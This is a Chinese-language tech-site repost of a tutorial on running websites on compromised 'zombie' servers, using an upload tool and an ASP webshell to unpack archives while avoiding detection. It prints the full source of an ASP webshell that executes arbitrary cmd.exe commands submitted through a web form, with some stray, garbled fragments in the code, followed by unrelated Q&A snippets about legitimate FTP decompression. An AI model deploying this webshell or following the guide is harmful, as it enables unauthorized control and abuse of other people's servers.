欢迎您访问我爱IT技术网,今天小编为你分享的编程技术是:【用ASP木马实现FTP和解压缩】,下面是详细的分享!
用ASP木马实现FTP和解压缩
在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和asp木马可以轻松实现.
asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找.最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下.上传.zip或者.rar文件到该肉鸡的web目录.在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<%=server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录.
只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。
--------以下是asp木马的源码,建议在<html>后加上<%=server.mappath(".") %>------------------------------
<%@ Language=VBScript %> ' -- create the COM objects that we will be using -- ' ' -- check for a command that we have posted -- ' ' -- Use a poor man's pipe ... a temp file -- ' End If < %> <%
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
<
Set oScript=Server.createObject("WSCRIPT.SHELL")
Set oScriptNet=Server.createObject("WSCRIPT.NETWORK")
Set oFileSys=Server.createObject("Scripting.FileSystemObject") <
szCMD=Request.form(".CMD")
If (szCMD <> "") Then <
szTempFile="C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile=oFileSys.OpenTextFile (szTempFile, 1, False, 0) <
<HTML>
<BODY>
<form action="<%=Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%=szCMD %>">
<input type=submit value="Run">
</form>
<PRE> <
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
> 以上所分享的是关于用ASP木马实现FTP和解压缩,下面是编辑为你推荐的有价值的用户互动:
相关问题:用java实现ftp侧压缩文件的解压
答:我们在开发项目的时候,特别是B/S系统,经常会遇到要批量上传文件的需求,对此需求一般有如下几个解决方案(以B/S为例):1. 在客户端提供文件上传接口,一次上传一个文件2. 一次上传多个文件3. 将需要上传的文件打包,一次上传到服务器,并自动解压到指... >>详细
相关问题:用ftp上传的压缩文件如何解压缩
答:操作流程 网站程序压缩注意 (windows系统选rar,Linux系统选zip) 进入主机自助管理平台(其他IDC我不知道,景安有一键解压这个功能) >>详细
相关问题:用java实现ftp侧压缩文件的解压
答:你这个问题有点怪,首先你要在服务器解压缩的话,你有服务器的Java程序执行权限吗?如果有的话可以考虑,在服务器做Java对Ftp文件夹的文件监控,发现压缩包自动调用解压缩代码解压,如果没有服务器执行权限,那你就不用考虑这个问题了 >>详细
- 评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)
-
